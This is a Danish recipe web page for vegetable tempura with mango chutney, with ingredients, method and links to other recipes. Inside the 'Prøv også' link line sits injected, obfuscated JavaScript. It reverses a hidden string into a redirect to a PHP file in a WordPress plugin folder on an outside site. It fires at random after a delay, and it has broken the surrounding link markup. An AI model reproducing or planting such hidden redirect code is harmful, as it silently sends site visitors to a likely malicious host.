Grøntsagstempura med mangochutney

Spicy, crunchy og delikat lille måltid, hvor den krydrede tempura giver helt nyt liv til de milde danske vintergrøntsager. Chutneyen frisker det hele godt op med den sødlige smag af mango og kraftige krydderier som spidskommen og ingefær. Dejligt vegetarisk måltid af kokken Thomas Hess fra Aarstiderne.

Opskrift til 4-8 pers.

Mangochutney:
1 chili, tørret eller frisk
½ tsk spidskommen
½ tsk korianderfrø
1 lille stykke ingefær, skåret i skiver
1 dl rørsukker
1 dl æbleeddike
1 stor mango
1 skalotteløg, skåret i både

Grøntsagstempura:
500 g grøntsager, fx blomkål, auberginer og squash
4 spsk kikærtemel
1 tsk bagepulver
1 tsk havsalt
1 spsk god karry
1 tsk cayennepeber
½ l neutral olie

Ved servering:
Frisk koriander

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard&_thumbnail_id=4340&preview=true”>Samosaruller med frisk chutney

Mangochutney: Rist chili, spidskommen og korianderfrø på en tør pande, og tilsæt ingefær, rørsukker, eddike, mango og skalotteløg, og lad det simre under låg i 40 min. Hæld chutneyen på et rent glas, og gem den i køleskabet.
Grøntsagstempura: Skyl grøntsagerne, og skær dem i skiver. Hvis du bruger blomkål, så skær denne i tynde både. Bland kikærtemel, bagepulver, havsalt, karry og cayennepeber sammen i en skål. Pisk varmt vand i, til konsistensen er som en let grød. Varm olien op i en tykbundet gryde. Når det syder let om træspidsen på en tændstik, er olien klar. Vend grøntsagerne i dejen, friter dem i olien lidt ad gangen, og lad dem dryppe af på fedtsugende papir.
Ved servering: Server grøntsagstempuraen med mangochutney og lidt frisk koriander.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere